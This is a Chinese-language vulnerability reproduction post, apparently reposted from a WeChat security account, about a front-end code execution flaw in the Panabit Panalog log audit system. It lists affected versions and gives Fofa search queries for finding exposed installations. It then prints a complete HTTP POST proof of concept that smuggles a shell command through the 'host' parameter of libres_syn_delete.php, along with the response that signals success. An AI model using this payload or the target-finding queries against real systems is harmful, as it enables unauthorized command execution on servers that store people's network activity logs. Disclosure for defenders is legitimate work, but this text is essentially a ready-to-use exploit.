【漏洞复现】Panabit-Panalog日志审计系统前台代码执行漏洞
2024-1-11 10:20:26 Author: 法克安全(查看原文) 阅读量:58 收藏

阅读须知

  亲爱的读者,我们诚挚地提醒您,本技术文章仅供个人研究学习参考。任何因传播或利用本文章提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。感谢您的理解与支持!

0x01
产品简介

Panabit日志审计系统是一款专门设计用来收集并处理用户所有网络活动的日志数据,包括会话数据、事件数据和身份数据。该系统不仅将大数据采集、大数据分析以及大数据整合应用于公安、高校、政企等行业的日志留存中,还支持对用户上网行为进行审计。

0x02
漏洞描述

 该系统 libres_syn_delete.php 文件存在代码执行漏洞,可以执行任意代码

0x03

 影响版本

影响版本: <= MARS r10p1Free 影响范围:1.2w-1.4w
访问:/cretime.txt 文件可查看版本.
0x04
Fofa资产测绘
body="对不起,您的日志系统时间和您的流控系统时间相差超过30分钟,请核对!"body="Maintain/cloud_index.php"body="js/pad-zeropadding.js" && category="日志分析与审计"其余语法自寻研究
0x05
测绘结果

0x06

 漏洞POC

POST /content-apply/libres_syn_delete.php HTTP/1.1Host: ***.***.***.***:****Cache-Control: max-age=0Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 110
token=10&id=10&host=;echo id >123.txt
0x07
漏洞复现

回显{yn:yes,str:OK},则表示代码执行成功

测试执行id命令并且输出到当前路径下的123.txt文件中

查看生成的txt文件,发现执行的命令回显内容成功写入


文章来源: http://mp.weixin.qq.com/s?__biz=MzkwMjIzNTU2Mg==&mid=2247484125&idx=1&sn=06e594c3637fbec2933add649f2168ed&chksm=c135a67aaf95c1919ef746e3bfd83660823ec811c61c8ab0615cd8af49386574a4519b33c7d8&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh